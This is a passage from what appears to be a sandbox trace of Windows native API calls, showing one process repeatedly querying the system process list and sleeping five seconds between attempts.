RegionSize=0xdea68*=0x10000) returned 0x0 [0252.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.580] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.593] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.599] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.608] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0252.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0252.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0252.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0252.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0252.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0252.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0252.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 